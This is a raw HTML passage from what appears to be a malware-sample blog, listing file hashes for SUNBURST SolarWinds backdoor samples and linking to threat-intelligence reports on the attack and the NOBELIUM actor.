4px;">b0b0cb50456a989114468733428ca9ef8096b18bce256634811ddf81f2119274</td></tr><tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">167ac4792548676f7e9b648a5c4b5546</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">90ef8db9cea3d981535659c4fa6b1476744b3834</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">4d59a7739f15c17f144587762447d5abb81c01f16224a3f7ce5897d1b6f7ee77</td></tr><tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">eb332fd9cc8be8e6a60d4ff9c5f5fcf7</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">e18df098c2fcb6a3961c310fdde58106e07ef9c0</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">4715a5009de403edd2dd480cf5c78531ee937381f2e69e0fb265b2e9f81f15c4</td></tr><tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">c073d9f6c0af5eff0a7150debe1d63db</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">d838a5b99044f8be1030a179ad3f8322ea4fb010</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">ec62c984941954f0eb4f3e8baee455410a9dc0deb222360d376e28981c53b1a0</td></tr><tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">2699077a996951eac7b369b6356ff296</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">8c6acecf8009665e0670ce634ce8f0d2907481c1</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">7419f0798c70888e7197f69ed1091620b2c6fbefead086b5faf23badf0474044</td></tr><tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">e3ed0d3b6f801d8ffe8dc18b262c14c5</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">a3c499d65a090b2df7fb519a9a366f4cb3d39f79</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">506c90747976c4cc3296a4a8b85f388ab97b6c1cfae11096f95977641b8f8b6f</td></tr><tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">ee6021e6682455f1bb8bead3d761530d</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">9bfe2745dd3123d6c0e3057717e394b6ca601588</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">0fc7154ebd80ea5d81d82e3a4920cb2699a8dd7c31100ca8ec0693a7bd4af8b7</td></tr><tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">f1639890944c37c25e1a4bdea35a6012</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">228684d884a11f1434620ce8e9af9226ab636658</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">6a698edb366f25f156e4b481639903d816c5f5525668f65e2c097ef682afc269</td></tr><tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">a7eb8d7b83e5fd622c1e205c911a110a</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">c685312922a40d841e583f9399f66d35d6ccfb46</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">187e0a02620b7775c2a8f88d5b27e80b5d419ad156afc50ef217a95547d0feaa</td></tr><tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">a31cb445d3131bf567720c43f2a74484</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">29e763a59424f9bb147df11a7b2ebfe9373a451f</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">56731c777896837782beff4432330486a941e4f3af44b4d24be7c62c16e96256</td></tr><tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">9ae3d8ba1311af690523aeb2e69bb469</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">1357dbf294817122b1e193762fb3d66a5d73e651</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">c33a905e513005cee9071ed10933b8e6a11be2335755660e3f7b2adf554f704a</td></tr><tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">89aafef2f334d6349d3d850e7f68f10f</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">97b4b5f19be70177dc5f867ed580478c9dc7e2b6</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">b0b4550ba09080e02c8a15cec8b5aeaa9fbb193cec1d92c793bdede78a70cec6</td></tr><tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">363e2b62f93c58c177e58dbe0a247fa0</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">e8abab85ccbaf646305aa5a786c0894d59bdcfd1</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">75f728fa692347e096386acd19a5da9b02dca372b66918be7171c522d9c6b42d</td></tr><tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">959553930a01d5518588340aa55a2de2</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">32e80ffc4948828009b192076fa85922528a5740</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">1a1fe7b6455153152037668d47c7c42a068b334b91949739ed93256d5e3fbd89</td></tr><tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">124f0b9dadbef030a4cba26393ce25df</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">15479f31109fd0a367ad681fb3ee63c6fb0ade0a</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">3d7a05e7ba9b3dd84017acab9aab59b459db6c50e9224ec1827cbf0a2aee47db</td></tr><tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">946a1974ec330a30aadb514efe8c394d</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">7af3c242e9dd444a7498de118911b0f5ad49a969</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">2762cbc81056348f2816de01e93d43398ba65354252c97928a56031e32ec776f</td></tr><tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">efec7686f695867bd45a4d2ccaf964d5</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">04af410cffd8f4b7ef0270ccae11ce6e01cc4633</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">cce564eb25a80549d746c180832d0b3d45dcd4419d9454470bfd7517868d0e10</td></tr><tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">ee3895f50bbc6316a746c239afc47e71</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">4aaf0acb7891fe06868ea442f55e5913961117d7</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">39e8455d21447e32141dc064eb7504c6925f823bf6d9c8ce004d44cb8facc80b</td></tr><tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">fd0ed9f5ffa9c912ba8d677687776448</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">b7abe535dccf587c80cbcd2d4cc0c30e330b3a54</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">750c447d6e3c7d74ccab736a0082ef437b1cd2000d761d3aff2b73227457b29c</td></tr><tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">cf584e69d6832fb7f92af0633e6e5222</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">fb652a73f6d6de07d22e13de5a19e9fc6f9814b5</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">f24ee966ef2dd31204b900b5c7eb7e367bc18ff92a13422d800c25dbb1de1e99</td></tr><tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">c96cfe462657240c155d4b1842292a4c</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">e94483c338213c667720a44d89c12a3f50547c71</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">ff07325f5454c46e883fefc7106829f75c27e3aaf312eb3ab50525faba51c23c</td></tr><tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">83cd7984cee0a4fde468216521d9d3fc</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">e8fa43110dd36085d79199788d2ea5c57236136e</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">37be3d8810959e63d5b6535164e51f16ccea9ca11d7dab7c1dfaa335affe6e3d</td></tr><tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">28267ea322e3975f1e98c64a1c77f509</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">e1d92e085df142d703ed9fd9c65ed92562a759fa</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">18f24841651461bd84a5eac08be9bce9eab54b133b0e837d5298dac44e199d5f</td></tr><tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">eb8385915f68d5fbbf7c0c05e480a999</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">a72734fcddbad58308d91274ad444a5b1d970c21</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">7d7d9a9df8b8ffd0a0c652a3d41b9a5352efb19424e42942aaf26196c9698019</td></tr><tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">22840909e11530390e8f74c6a162ded1</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">78d82f0ff396393e958553f25a47145916ea4e39</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">9a72e56ac0f1badd3ca761b53e9998a7e0525f2055dbec01d867f62bdb30418e</td></tr><tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">577df0d0d1ebfde0c67cf6489d9a1974</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">a57a31db630fd55666cfd3ccdacf78cec8fabc43</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">4fdc37f59801976606849882095992efecee0931ece77d74015113123643796e</td></tr><tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">22cb7775c867ac98f7c4b1266e3534b4</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">55b6a0512a9da7f7e854cb5155708e3f7fc34d7a</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">7eb1dc1719f0918828cc8349ee56ca5e6bbde7cada3bc67a11d7ff7f420c7871</td></tr><tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">1e2e2b8f1c81c01bac895e113f7a4846</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">3bcf40b51363e2e69aacea81f700bd246fa99882</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">c532d19652ea6d4e0ebb509766de1ec594dd80152f92f7ef6b80ad29d2aa8cf4</td></tr><tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">9e2b456c62b027c89b36dc9109e50f01</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">617fddb80de29bc455c0ecfd4b64d194fe911541</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">e9a858127f5f6e5e0e94ed655a2bf9ed228f87bc99d9b12113e27dcc84be3909</td></tr><tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">61a3d983a1fde813204b8f6f13842163</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">336a3a59b782b49c2253bd0afeefdb43b24f70b6</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">7963f8606e4c0e7502a813969a04e1266e7cd20708bef19c338e8933c1b85eda</td></tr><tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">f5de326683df44d71ed1b986fd836e0b</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">33bc899da6afd2b82b27d59acd0844b521e57079</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">17c3cf5742d2a0995afb4dd2a2d711abe5de346abde49cf4cf5b82c14e0a155f</td></tr><tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">268c62a4b45d08a0639ead11b2feebd8</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">c1d9237230acc994067fdc1d6502b6a84afd1b9a</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">cb6c05b2e9d8e3c384b7eabacde32fc3ac2f9663c63b9908e876712582bf2293</td></tr><tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">2d9702caab94b9c7788443c13b1b1ce1</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">08cef1c0cc4942221a5304ad0a680324a2f0f39a</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">0f7a8611deea696b2b36e44ea652c8979e296b623e841796a4ea4b6916b39e7c</td></tr><tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">12ed130045b2e731bc66c9261c88efaa</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">df697bee43eb208144496ad3ab56a02c92d3b69a</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">B258a747202b1ea80421f8c841c57438ffb0670299f067dfeb2c53ab50ff6ded</td></tr><tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">65792e4d02f910d20dcf74487cb9fab1</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">942337f3ea28f553b47dc05726bb062befe09fef</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">9fbeb629ea0dc72ac8db680855984d51b28c1195e48abff2e68b0228f49d5b0f</td></tr><tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">08982381ef296038ae7ad8d083ef8ca8</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">8cf1d9dbd5d41dd9481249a1d5b1d930afa083d3</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">d0aad99f10bdd6f6af2f7a0f6c319ed7d126de4d1ff44ca86858e7ffc17cc39b</td></tr><tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">df32b34cc480934ca2ac0895863dd030</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">e0256ff9efa8fca3813924d7ac556ddc44dc08b1</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">5fd4e486bd7e12454f67ba8fcdaa9afc88b4d1c29705b0cffc9d32000700d314</td></tr><tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">a89521c26b2c660d41101ca0a6100cd3</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">75c8cf7b14ea7bb8557efd80170a1df1c89d9797</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">6f3994ad6b418b55ba2a3cd4f4d8cff35284a5790ea3dd38f1abf8699410430a</td></tr><tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">65501683cfe1e0af1ff7463de684a2fe</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">fa7887bc9d48fcfc6fd0e774092ca711ae28993a</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">61da1819361c095f802ce2151092df02531eeeb713e7db07100a9a80874d902a</td></tr><tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">079766094541035de5f115a9bbb4f583</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">8423b25054aa78535c49042295558f33d34deae1</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">6434913278186cb5b12ca38580a4e94b2ce2af83a836f7e50ab9c5ea8e265a59</td></tr><tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">d8434e637305cfc941744807698c846a</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">0de3fce5c10b9122335866f5c1a817ed8a6d4269</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">a98e108588e31f40cdaeab1c04d0a394eb35a2e151f95fbf8a913cba6a7faa63</td></tr><tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">d2efb0b8b82576016416aacbde6c3873</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">19cac454edb76d7e879598d8c7e8e032f9d006d2</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">a4b705baac8bb2c0d2bc111eae9735fb8586d6d1dab050f3c89fb12589470969</td></tr><tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">f690fa242d8200f27e71e11d469b584d</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">f14f8a0ee542b6db79c52266450c5fe0412a0d62</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">2d88db4098a72cd9cb58a760e6a019f6e1587b7b03d4f074c979e776ce110403</td></tr><tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">4d01975268c215fc26ed79ebd17ec22d</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">64c6752af3632f6f49fd6db091182e753e5d9f80</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">992df82cf31a91acd034411bb43a1ec127fa15d613b108287384882807f81764</td></tr><tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">cd8915c63f3134425aa7c851f5f1e645</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">3ba578e4396145b18747c914fed9d6c8f027fe2c</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">0f9f31bbc69c8174b492cf177c2fbaf627fcdb5ac4473ca5589aa2be75cee735</td></tr><tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">ccc3750d9270d1e8c95649d91f94033b</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">058f0190a58646ab1a6295eed496732e1e3f7cbf</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">29decd1e88b297aa67fef6e14e39889cfd2454c581b9371a1003b63a28324d0f</td></tr><tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">af9a60ea728985f492119ebf713e0716</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">4fecd1895b6f7ff41b8b0dee700b5f194743b36a</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">9d7c3463d4a4f4390313c214c7a79042b4525ae639e151b5ec8a560b0dd5bd0a</td></tr><tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">5d5c99a08a7d927346ca2dafa7973fc1</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">189166d382c73c242ba45889d57980548d4ba37e</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">a196c6b8ffcb97ffb276d04f354696e2391311db3841ae16c8c9f56f36a38e92</td></tr><tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">14c8482f302b5e81e3fa1b18a509289d</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">16525cb2fd86dce842107eb1ba6174b23f188537</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78</td></tr><tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">e61518ae9454a563b8f842286bbdb87b</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">82d29b52e35e7938e7ee610c04ea9daaf5e08e90</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">9ef7dbd3da51332a78eff19146d21c82957821e464e8133e9594a07d716d892d</td></tr><tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">3907c7fbd4148395284d8e6e3c1dba5d</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">a67205dc84ec29eb71bb259b19c1a1783865c0fc</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">34CA75A8C190F20B8A7596AFEB255F2228CB2467BD210B2637965B61AC7EA907</td></tr><tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">e61518ae9454a563b8f842286bbdb87b</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">82d29b52e35e7938e7ee610c04ea9daaf5e08e90</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">9ef7dbd3da51332a78eff19146d21c82957821e464e8133e9594a07d716d892d</td></tr><tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">ee47d6ae8414f6c6ca28a3b76bf75e44</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">a983bd69a71322d64199e67f2abcfe5ef0e1bca7</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">9cdaacaba35c3a473ec5b652d035a9593ee822609e79662223869e2b7298dc0a</td></tr><tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">ba45247858c0739865a52996768b7485</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">aff0b6eab23bbf4e5cb94fd4292c6d961dee060e</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">00bc665d96ecadc6beb2a9384773a70391f08f8e7a2876253f32ceec793eb728</td></tr><tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">6f93fd91f17130aabd5251e7bae3eeaa</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">2af6e61d203191b4b8df982f37048937a1f9696c</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">ff3b45ecfbbdb780b48b4c829d2b6078d8f7673d823bedbd6321699770fa3f84</td></tr><tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">14c8482f302b5e81e3fa1b18a509289d</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">16525cb2fd86dce842107eb1ba6174b23f188537</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78</td></tr><tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">56af47c87029b9fba5fe7c81e99cedca</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">ea65565404ffde218ebccaeaca00ac1a2937dc57</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">35ab54a9502e975c996cbaee3d6a690da753b4af28808d3be2054f8a58e5c7c5</td></tr><tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">5d5c99a08a7d927346ca2dafa7973fc1</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">189166d382c73c242ba45889d57980548d4ba37e</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">a196c6b8ffcb97ffb276d04f354696e2391311db3841ae16c8c9f56f36a38e92</td></tr><tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">db600240aecf9c6d75c733de57f252bf</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">8756712e2c73ee3f92ded3852e41a486be3de6e2</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">bbe1949ffd9188f5ad316c6f07ef4ec18ba00e375c0e6c2a6d348a2a0ab1e423</td></tr></tbody></table></div><div class="ad-unit" style="border: 0px; color: #1c1c1c; font-family: Raleway, Helvetica, Arial, sans-serif; font-stretch: inherit; font-variant-east-asian: inherit; font-variant-numeric: inherit; line-height: inherit; margin: 1em 0px; padding: 0px; text-align: center; vertical-align: baseline; width: 3285px;"><ins class="adsbygoogle" data-ad-client="ca-pub-7932050359867089" data-ad-format="auto" data-ad-slot="5937817505" data-ad-status="filled" data-adsbygoogle-status="done" style="display: block; height: 280px; margin: 0px auto; width: 728px;"><div aria-label="Advertisement" id="aswift_1_host" style="background-color: transparent; border: none; display: inline-block; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; height: 280px; line-height: inherit; margin: 0px; overflow: visible; padding: 0px; position: relative; vertical-align: baseline; visibility: visible; width: 728px;" tabindex="0" title="Advertisement"></div></ins></div></div><div class="separator" style="clear: both; text-align: left;"><div class="ad-unit" style="border: 0px; color: #1c1c1c; font-family: Raleway, Helvetica, Arial, sans-serif; font-stretch: inherit; font-variant-east-asian: inherit; font-variant-numeric: inherit; line-height: inherit; margin: 1em 0px; padding: 0px; text-align: center; vertical-align: baseline; width: 3170px;"><ins class="adsbygoogle" data-ad-client="ca-pub-7932050359867089" data-ad-format="auto" data-ad-slot="5937817505" data-ad-status="filled" data-adsbygoogle-status="done" style="display: block; height: 280px; margin: 0px auto; width: 728px;"><div aria-label="Advertisement" id="aswift_1_host" style="background-color: transparent; border: none; display: inline-block; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; height: 280px; line-height: inherit; margin: 0px; overflow: visible; padding: 0px; position: relative; vertical-align: baseline; visibility: visible; width: 728px;" tabindex="0" title="Advertisement"></div></ins></div></div></span></div></div></div></div><body>
<meta charset="utf-8"></meta>
<p class="site-instruction" style="-webkit-text-stroke-width: 0px; border: 0px; color: #1c1c1c; font-family: Raleway, Helvetica, Arial, sans-serif; font-size: 1.1em; font-stretch: inherit; font-style: normal; font-variant-caps: normal; font-variant-east-asian: inherit; font-variant-ligatures: normal; font-variant-numeric: inherit; font-weight: 400; letter-spacing: normal; line-height: inherit; margin: 0px 0px 0.8em; orphans: 2; padding: 0px; text-align: center; text-decoration-color: initial; text-decoration-style: initial; text-decoration-thickness: initial; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 2; word-spacing: 0px;"></p></body>Milahttp://www.blogger.com/profile/09472209631979859691noreply@blogger.com0tag:blogger.com,1999:blog-7885177434994542510.post-69690004783562028612020-12-14T09:47:00.027-05:002023-02-18T03:02:12.815-05:002020-12-13 SUNBURST SolarWinds Backdoor samples<div style="background-color: #618f2b; color: white; line-height: 19px; text-align: center;"> </div><div style="line-height: 19.6px;"><div style="line-height: 19px;"><div style="line-height: 19px;"><span style="font-family: verdana;"><div dir="ltr" trbidi="on"><br /></div><div dir="ltr" trbidi="on"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmbZcIFqRLezjmwZ2fW5KK_a15WCW0lODRagpjfQLOqvE0BJ-vnqDtqqlI6BE1hU3cl38rwunL0hTZCSnfqzxed8w3Wf5QD_E38tfVmjzV3RMihcmqiAC-I_c8rx8OD8S5M_6Sqmhy-l_wguRnsYochSKh-n6g-M5p1nVKOZmzsdvxCJgkmHeUp7vB/s325/image.png" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="316" data-original-width="325" height="223" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmbZcIFqRLezjmwZ2fW5KK_a15WCW0lODRagpjfQLOqvE0BJ-vnqDtqqlI6BE1hU3cl38rwunL0hTZCSnfqzxed8w3Wf5QD_E38tfVmjzV3RMihcmqiAC-I_c8rx8OD8S5M_6Sqmhy-l_wguRnsYochSKh-n6g-M5p1nVKOZmzsdvxCJgkmHeUp7vB/w230-h223/image.png" width="230" /></a></div>2020-12-13 Fireeye <br /><a href="http://contagio.deependresearch.org/read/Nobelium_2021_Solarwinds_The+Resurgence+of+Russian+Threat+Actor%2C+NOBELIUM_2021-11-03_Avertium.pdf">Highly Evasive Attacker Leverages SolarWinds Supply Chain to Compromise Multiple Global Victims With SUNBURST Backdoor</a></div><div><br /></div><div><a href="https://s3.amazonaws.com/contagio.deependresearch.org/read/Nobelium/Nobelium_2021_Solarwinds_The+Resurgence+of+Russian+Threat+Actor%2C+NOBELIUM_2021-11-03_Avertium.pdf">The Resurgence of Russian Threat Actor, NOBELIUM</a><br /><br /></div></span></div><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9fekBavhMnuxb9txFvxkWzKz4DZBXwlXNpsm2_s6FKlTJngInQG_9h4amviU59zeRl61NodBmrkvhq-mtc9FDyOUGO8ZaBK-QZFXtHsqFqL0su0Z6rt5Hqpp8WElMdztahWYVyZ2dfdE/s1600/rednag.png" style="clear: left; color: #660000; float: left; line-height: 19.6px; margin-bottom: 1em; 